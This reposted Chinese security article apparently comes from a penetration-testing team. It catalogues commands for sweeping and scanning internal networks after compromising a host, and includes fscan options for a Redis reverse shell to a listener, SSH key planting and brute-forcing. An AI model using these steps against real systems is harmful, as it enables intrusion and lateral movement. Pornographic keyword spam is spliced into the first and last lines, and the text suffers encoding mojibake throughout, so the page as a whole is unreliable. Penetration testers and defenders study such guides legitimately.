色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

內(nèi)網(wǎng)主機探測工具合集

jf_vLt34KHi ? 來源:Tide安全團隊 ? 2023-05-11 11:44 ? 次閱讀

前言

在拿下通內(nèi)網(wǎng)的主機權(quán)限后,普遍需要更進一步的收集內(nèi)網(wǎng)信息,此時如何有效快速的探測內(nèi)網(wǎng)存活主機關(guān)系到我們下一步的進展情況。當然自從有了Fscan后,我們的效率已經(jīng)大大提高,不過在某些情況下fscan有時會無法正常探測,此時如何使用其他方法有效地收集內(nèi)網(wǎng)信息成了關(guān)鍵,這篇文章主要記錄一下在不同環(huán)境、不同條件下探測內(nèi)網(wǎng)存活主機的方法。

內(nèi)網(wǎng)主機探測的不同場景

我們主機掃描的場景主要分為三種:

1、獲取到了webshell,此時一般用系統(tǒng)命令或上傳腳本工具進行探測;

2、主機已在目標內(nèi)網(wǎng),比如已經(jīng)通過正向或者反向代理搭建隧道的場景。此時可以考慮proxychains+Nmap掃描;

3、拿到了一個反彈的webshell,則可以考慮MSF。要根據(jù)不同的場景考慮支持存活探測的協(xié)議,包括了ARP、ICMP、SMB、 UDP、SNMP協(xié)議等;支持端口掃描的方式,包括TCP掃描、UDP掃描、ICMP掃描等。

內(nèi)網(wǎng)不同協(xié)議主機探測的方式

ICMP協(xié)議探測

它是TCP/IP協(xié)議簇的一個子協(xié)議,用于在IP主機、路由器之間傳遞控制消息??刂葡⑹侵?a href="http://m.1cnz.cn/v/tag/1722/" target="_blank">網(wǎng)絡(luò)通不通、主機是否可達、路由是否可用等網(wǎng)絡(luò)本身的消息。這些控制消息雖然并不傳輸用戶數(shù)據(jù),但是對于用戶數(shù)據(jù)的傳遞起著重要的作用。

ping

ping是我們一個常用工具,主要用來測試網(wǎng)絡(luò)連通性。也可以用它來完成對C段的探測,雖然效率低時間慢,但是不易出發(fā)安全規(guī)則。(服務(wù)器開啟防火墻或者禁ping的時候不可用,否則影響探測結(jié)果)

?Windows

 for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1|find /i "ttl="

3017aef4-ef45-11ed-90ce-dac502259ad0.png

這是我在CS里執(zhí)行的ping命令,可以看到c段內(nèi)有兩臺主機存活 也可以寫進文件里,方便后續(xù)查看。寫進C盤的話需要administer權(quán)限,可以考慮更換盤符

@for/l%iin(1,1,255)do@ping-n1-w40192.168.1.%i&iferrorlevel1(echo192.168.1.%i>>./a.txt)else(echo192.168.1.%i>>./111.txt)

Linux

for k in $( seq 1 255);do ping -c 1 10.211.55.|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

3029e09c-ef45-11ed-90ce-dac502259ad0.png

另外,還可以結(jié)合系統(tǒng)自帶的traceroute、arp 、netstat等命令收集內(nèi)網(wǎng)信息,curl、wget可以用來做端口探測

nmap

nmap ‐sP ‐PI 192.168.1.0/24 ‐T4
#或者
nmap ‐sn ‐PE ‐T4 192.168.1.0/24

303b2ac8-ef45-11ed-90ce-dac502259ad0.png

UDP協(xié)議探測

Internet 協(xié)議集支持一個無連接的傳輸協(xié)議,該協(xié)議稱為用戶數(shù)據(jù)報協(xié)議(UDP,User Datagram Protocol)。UDP 為應(yīng)用程序提供了一種無需建立連接就可以發(fā)送封裝的 IP 數(shù)據(jù)包的方法。

Msf

msf > use auxiliary/scanner/discovery/udp_probe
或者
msf > use auxiliary/scanner/discovery/udp_sweep

3056fab4-ef45-11ed-90ce-dac502259ad0.png

nmap

sudo nmap -sU -T5 -sV --max-retries 1 10.211.55.5 -p 500

3067f314-ef45-11ed-90ce-dac502259ad0.png

unicornscan(Linux下使用)

unicornscan-mU10.255.55.5

ScanLine(Windows下使用)

sl.exe -h -u 53,161,137,139 -O C:UsersAdministratorDes
ktoplog.txt -p 192.168.1.1-254

3084c228-ef45-11ed-90ce-dac502259ad0.png

Netbios協(xié)議

NetBIOS協(xié)議是由IBM公司開發(fā),主要用于數(shù)十臺計算機的小型局域網(wǎng)。NetBIOS協(xié)議是一種在局域網(wǎng)上的程序可以使用的應(yīng)用程序編程接口(API),為程序提供了請求低級服務(wù)的統(tǒng)一的命令集,作用是為了給局域網(wǎng)提供網(wǎng)絡(luò)以及其他特殊功能,幾乎所有的局域網(wǎng)都是在NetBIOS協(xié)議的基礎(chǔ)上工作的。

nmap

sudo nmap -sU --script nbstat.nse -p137 192.168.1.0/24 -T4
309d8038-ef45-11ed-90ce-dac502259ad0.png

MSF

use auxiliary/scanner/netbios/nbname

30bbfef0-ef45-11ed-90ce-dac502259ad0.png

nbtscan掃描

互聯(lián)網(wǎng)搜索引擎nbtscan是一個掃描WINDOWS網(wǎng)絡(luò)NetBIOS信息的小工具,2005年11月23日發(fā)布。NBTSCAN身材嬌小,簡單快速。但只能用于局域網(wǎng),可以顯示IP,主機名,用戶名稱和MAC地址等等。

下載地址:
http://www.unixwiz.net/tools/nbtscan.html#download
以Windows用法為例:nbtscan-1.0.35.exe -m 10.211.55.0/24

30d1674a-ef45-11ed-90ce-dac502259ad0.png

ARP協(xié)議

這是根據(jù)IP地址獲取物理地址的一個TCP/IP協(xié)議。主機發(fā)送信息時將包含目標IP地址的ARP請求廣播到局域網(wǎng)絡(luò)上的所有主機,并接收返回消息,以此確定目標的物理地址;收到返回消息后將該IP地址和物理地址存入本機ARP緩存中并保留一定時間,下次請求時直接查詢ARP緩存以節(jié)約資源。

nmap

nmap -sn -PR 10.211.55.1/24

30dd45f6-ef45-11ed-90ce-dac502259ad0.png

MSF

use auxiliary/scanner/discovery/arp_sweep

30f8caf6-ef45-11ed-90ce-dac502259ad0.png

netdiscover

Netdiscover是一種網(wǎng)絡(luò)掃描工具,通過ARP掃描發(fā)現(xiàn)活動主機,可以通過主動和被動兩種模式進行ARP掃描。通過主動發(fā)送ARP請求檢查網(wǎng)絡(luò)ARP流量,通過自動掃描模式掃描網(wǎng)絡(luò)地址。

sudo netdiscover -r 10.211.55.0/24 -i eth0

310c77fe-ef45-11ed-90ce-dac502259ad0.png

arp-scan

可以看到這工具掃描速度挺快的

sudo arp-scan --interface=eth0 --localnet

311ff5f4-ef45-11ed-90ce-dac502259ad0.png

SMB協(xié)議

SMB(Server Message Block)通信協(xié)議是微軟和英特爾在1987年制定的協(xié)議,主要是作為Microsoft網(wǎng)絡(luò)的通訊協(xié)議。SMB 是在會話層(session layer)和表示層(presentation layer)以及小部分應(yīng)用層(application layer)的協(xié)議。

Msf

use auxiliary/scanner/smb/smb_version

3135cfdc-ef45-11ed-90ce-dac502259ad0.png

nmap

nmap -sU -sS --script smb-enum-shares.nse  -p 445 10.211.55.3

314bb8ec-ef45-11ed-90ce-dac502259ad0.png通過cmd
for /l %a in (1,1,254) do start /min /low telnet 10.211.55.%a 445

crackmapexec

CrackMapExec(CME)是一款后滲透利用工具,可幫助自動化大型活動目錄(AD)網(wǎng)絡(luò)安全評估任務(wù)。其締造者@byt3bl33d3r稱,該工具的生存概念是,“利用AD內(nèi)置功能/協(xié)議達成其功能,并規(guī)避大多數(shù)終端防護/IDS/IPS解決方案?!?/p>

cme smb 10.211.55.0/24

SNMP協(xié)議

SNMP 是專門設(shè)計用于在 IP 網(wǎng)絡(luò)管理網(wǎng)絡(luò)節(jié)點(服務(wù)器、工作站、路由器、交換機及HUBS等)的一種標準協(xié)議,它是一種應(yīng)用層協(xié)議。SNMP 使網(wǎng)絡(luò)管理員能夠管理網(wǎng)絡(luò)效能,發(fā)現(xiàn)并解決網(wǎng)絡(luò)問題以及規(guī)劃網(wǎng)絡(luò)增長。通過 SNMP 接收隨機消息(及事件報告)網(wǎng)絡(luò)管理系統(tǒng)獲知網(wǎng)絡(luò)出現(xiàn)問題。

nmap

sudo nmap -sU --script snmp-brute 10.211.55.0/24 -T4

3165bc10-ef45-11ed-90ce-dac502259ad0.png

Msf

use auxiliary/scanner/snmp/snmp_enum
317fa922-ef45-11ed-90ce-dac502259ad0.png

snmp for pl

這些 perl 腳本用于從目標系統(tǒng)中提取 SNMP 數(shù)據(jù)并解析這些文件以獲取潛在的可用數(shù)據(jù)。

項目地址:https://github.com/dheiland-r7/snmp

這個工具在使用前需要編譯,這里參考網(wǎng)上大佬的教程

wget http://www.cpan.org/modules/by-module/NetAddr/NetAddr-IP-4.078.tar.gz
tar xvzf ./NetAddr-IP-4.078.tar.gz
cd NetAddr-IP-4.078/
perl Makefile.PL
make
make install

31991dda-ef45-11ed-90ce-dac502259ad0.png
使用方法:./snmpbw.pl 192.168.0.1 public 2 1
 ./snmpbw.pl ipfile.txt  public 2 4

31b43d9a-ef45-11ed-90ce-dac502259ad0.png

常見的一些其它工具

Fscan

這個就不多介紹了,太常見

fscan -h 192.168.1.1/24
fscan.exe -h 192.168.1.1/24  (默認使用全部模塊)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫私鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計劃任務(wù)反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令執(zhí)行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模塊ssh和端口)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模塊)

通過powershell腳本掃描IP地址存活

這里列舉幾個項目地址:

https://github.com/nettitude/PoshC2_Old/blob/master/Modules/Invoke-Arpscan.ps1
https://github.com/dwj7738/My-Powershell-Repository/blob/master/Scripts/Invoke-TSPingSweep.ps1

使用方法:

powershell.exe -exec bypass -Command "Import-Module .arpscan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24"
powershell.exe -exec bypass -Command "Import-Module ./Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.1.0 -EndAddress 192.168.1.255"
此外,還可以用powershell實現(xiàn)基本的端口掃描功能

針對單個IP的多個端口的掃描

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.3",$_)) "Port $_ is open!"} 2>$null

31c9359c-ef45-11ed-90ce-dac502259ad0.png針對單個IP的多個端口的掃描
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.3",$_)) "Port $_ is open!"} 2>$null
31de04f4-ef45-11ed-90ce-dac502259ad0.png針對某IP段 & 多個端口的掃描
1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.$a",$_)) "Port $_ is open!"} 2>$null}
31ed3bb8-ef45-11ed-90ce-dac502259ad0.png

PTscan

PTscan(Phantom scanner) 是一款界面友好的輕量級web應(yīng)用資產(chǎn)掃描器,適合于內(nèi)網(wǎng)滲透測試環(huán)境下web的資產(chǎn)快捷識別,只需Python環(huán)境,無需第三方擴展庫,掃描結(jié)果使用zoomeye網(wǎng)頁樣式。
PTscan參考了F-NAScan的設(shè)計思路,在其基礎(chǔ)上修改而成,把程序重心放在WEB掃描和識別功能上。
使用方法:

Usage: python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306]  [-m 50] [-t 10] [-n] [-b] [-r]
##
-f  指定掃描目標文件,文件格式如list.txt所示,同時支持IP和URL
-h  指定掃描IP或IP段,支持段掃描,如192.168.1 即為掃描C段,192.168 即為掃描B段
-p  指定掃描端口,缺省使用程序中的配置端口
-m  指定線程數(shù)
-t  指定timeout
-n  不進行ping操作,直接掃描
-b  開啟Banner識別

-r ReverseIP



審核編輯 :李倩


聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • Web
    Web
    +關(guān)注

    關(guān)注

    2

    文章

    1269

    瀏覽量

    69611
  • UDP協(xié)議
    +關(guān)注

    關(guān)注

    0

    文章

    70

    瀏覽量

    12725
  • 數(shù)據(jù)包
    +關(guān)注

    關(guān)注

    0

    文章

    267

    瀏覽量

    24437

原文標題:內(nèi)網(wǎng)主機探測工具合集

文章出處:【微信號:Tide安全團隊,微信公眾號:Tide安全團隊】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    幫朋友做的脈沖探測主機

    探測主機
    電子愛好者(松哥)
    發(fā)布于 :2023年12月08日 11:50:47

    Labview如何在兩臺不同內(nèi)網(wǎng)主機的vi之間通信

    我想問下,如何在當前主機vi中的子面板里顯示和控制另一個遠程主機中的vi程序呢?兩臺機器不在一個局域網(wǎng)內(nèi),有可能都不是公網(wǎng)IP,用路由器接上互聯(lián)網(wǎng)的,這時候怎么樣實現(xiàn)兩臺內(nèi)網(wǎng)主機之間的通信,不是用web發(fā)布;望知道的大神指點迷津
    發(fā)表于 08-19 17:07

    【W(wǎng)RTnode2R申請】物聯(lián)網(wǎng)主機

    申請理由:原有方案使用stm32以及工控機,對wifi的原生支持不太好,因為手機等聯(lián)網(wǎng)比較麻煩,畢竟農(nóng)業(yè)物聯(lián)網(wǎng)不具備特別好的實施環(huán)境所以我準備換掉方案項目描述:準備實現(xiàn)新版本的農(nóng)業(yè)物聯(lián)網(wǎng)主機,代替
    發(fā)表于 09-10 11:27

    nat的類型有哪些

    NAT分為兩大類,基本的NAT和NAPT(Network Address/Port Translator)。 基本的NAT,它僅將內(nèi)網(wǎng)主機的私有IP地址轉(zhuǎn)換成公網(wǎng)IP地址,但并不將TCP/UDP端口
    發(fā)表于 11-04 09:17

    FPipe是怎樣通過本地的53端口轉(zhuǎn)發(fā)到內(nèi)網(wǎng)的3389端口上的

    0.0.0.0 -s 53 -r 3389 192.168.222.137然后回到本地來遠程連接就可以了 0x03 msf正向上線這里我們使用bind型的payload,保證讓無法正常上網(wǎng)的內(nèi)網(wǎng)主機也能正常反彈
    發(fā)表于 07-25 15:04

    四個方法探測服務(wù)器的內(nèi)網(wǎng)存活主機

    在滲透中,當我們拿下一臺服務(wù)器作為跳板機進一步進行內(nèi)網(wǎng)滲透時,往往需要通過主機存活探測和端口掃描來收集內(nèi)網(wǎng)資產(chǎn)。
    的頭像 發(fā)表于 09-27 15:18 ?1.4w次閱讀
    四個方法<b class='flag-5'>探測</b>服務(wù)器的<b class='flag-5'>內(nèi)網(wǎng)</b>存活<b class='flag-5'>主機</b>

    外網(wǎng)用戶通過外網(wǎng)地址訪問內(nèi)網(wǎng)服務(wù)器實驗配置

    網(wǎng)主機通過域名訪問Web服務(wù)器,首先需要通過訪問內(nèi)網(wǎng)DNS服務(wù)器獲取Web服務(wù)器的IP地址,因此需要通過配置NAT內(nèi)部服務(wù)器將DNS服務(wù)器的內(nèi)網(wǎng)IP地址和DNS服務(wù)端口映射為一個外網(wǎng)地址和端口。
    的頭像 發(fā)表于 08-31 10:53 ?2983次閱讀

    一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測漏洞掃描工具SweetBabyScan

    輕量級內(nèi)網(wǎng)資產(chǎn)探測漏洞掃描工具:SweetBabyScan,是一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測漏洞掃描
    的頭像 發(fā)表于 12-02 09:23 ?4955次閱讀

    一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測漏洞掃描工具

    甜心寶貝是一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測漏洞掃描工具,集成了Xray與Nuclei的Poc。
    的頭像 發(fā)表于 12-14 09:48 ?4000次閱讀

    一款內(nèi)網(wǎng)探測工具

    工具內(nèi)置 Top1000 端口探測同時也支持自定義端口探測,支持最新 nmap_service_probes 規(guī)則進行服務(wù)指紋識別,支持對 SSH/SMB/Mysql/SqlServer
    的頭像 發(fā)表于 08-09 16:09 ?588次閱讀

    內(nèi)網(wǎng)穿透工具的種類、原理和使用方法

    本文以滲透的視角,總結(jié)幾種個人常用的內(nèi)網(wǎng)穿透,內(nèi)網(wǎng)代理工具,介紹其簡單原理和使用方法。
    的頭像 發(fā)表于 08-25 10:35 ?1977次閱讀
    <b class='flag-5'>內(nèi)網(wǎng)</b>穿透<b class='flag-5'>工具</b>的種類、原理和使用方法

    智慧樓宇的心臟:E6000物聯(lián)網(wǎng)主機

    智慧樓宇是指通過全面覆蓋的感知設(shè)備和互聯(lián)網(wǎng)技術(shù),為建筑提供高效、舒適、安全、環(huán)保、可持續(xù)的智能化服務(wù)。 在科技快速發(fā)展的今天,智慧樓宇已經(jīng)不再是遙不可及的夢想。而在這個夢想成真的過程中,物聯(lián)網(wǎng)主機
    的頭像 發(fā)表于 02-23 16:36 ?425次閱讀
    智慧樓宇的心臟:E6000物聯(lián)<b class='flag-5'>網(wǎng)主機</b>

    物聯(lián)網(wǎng)主機:為智能交通賦能

    物聯(lián)網(wǎng)(IoT)技術(shù)的發(fā)展為智能交通領(lǐng)域帶來了許多創(chuàng)新的解決方案。而在物聯(lián)網(wǎng)應(yīng)用中,物聯(lián)網(wǎng)主機起著關(guān)鍵的作用。本文將為大家介紹一款名為E6000的物聯(lián)網(wǎng)主機,它是一種多協(xié)議、多接口的物聯(lián)網(wǎng)主機,為
    的頭像 發(fā)表于 02-23 16:44 ?556次閱讀
    物聯(lián)<b class='flag-5'>網(wǎng)主機</b>:為智能交通賦能

    物聯(lián)網(wǎng)主機 E6000 在智慧工地上的應(yīng)用

    隨著科技的不斷發(fā)展,智慧工地的概念逐漸普及。物聯(lián)網(wǎng)技術(shù)的應(yīng)用為工地管理帶來了革命性的變化,物聯(lián)網(wǎng)主機E6000作為一款領(lǐng)先的物聯(lián)網(wǎng)主機設(shè)備,在智慧工地上發(fā)揮著重要作用。 物聯(lián)網(wǎng)主機 E6000
    的頭像 發(fā)表于 06-20 16:03 ?304次閱讀
    物聯(lián)<b class='flag-5'>網(wǎng)主機</b> E6000 在智慧工地上的應(yīng)用

    常見的內(nèi)網(wǎng)穿透工具對比

    國內(nèi)的內(nèi)網(wǎng)穿透工具有不少選擇,適合不同的使用場景和需求。以下是一些比較常見的國內(nèi)內(nèi)網(wǎng)穿透工具
    的頭像 發(fā)表于 11-06 14:59 ?1207次閱讀
    主站蜘蛛池模板: 国产欧洲野花A级| 99pao成人国产永久免费视频| 久久99精品涩AV毛片观看 | 美女脱内衣裸身尿口露出来| 国产精品爆乳尤物99精品| 97国产露脸精品国产麻豆| 亚洲成a人片777777久久| 色小说在线| 欧美一第一页草草影院| 久久热最新网站获取3| 国产亚洲精品福利视频| 成人性视频全过程| 99福利视频| 中文字幕人成人乱码亚洲影视| 亚洲AV电影天堂男人的天堂| 日韩亚洲人成在线| 欧美白人极品性喷潮| 久久欧洲AV无码精品色午夜麻豆| 国产人妻777人伦精品HD| 高h 大尺度纯肉 np快穿| 99精品久久精品一区二区| 在线免费观看毛片网站| 亚洲视频999| 亚洲精品天堂自在久久77| 无码人妻精品一区二区蜜桃在线看| 欧美性受xxxx狂喷水| 妙玉被肉干高H潮文| 秘密影院久久综合亚洲综合| 久久人妻少妇嫩草AV蜜桃35I| 含羞草影院AE在线观看| 十九岁在线观看免费完整版电影| 欧美 国产 日产 韩国 在线| 美女露出逼| 美女也烦恼主题曲| 美女岔开腿露出粉嫩花苞| 久久亚洲精品AV成人无| 久久精品熟一区二区三区| 久久精品国产亚洲AV麻豆欧美玲 | 十分钟免费观看高清视频大全| 琪琪see色原网色原网站| 青柠在线观看免费高清电视剧荣耀 |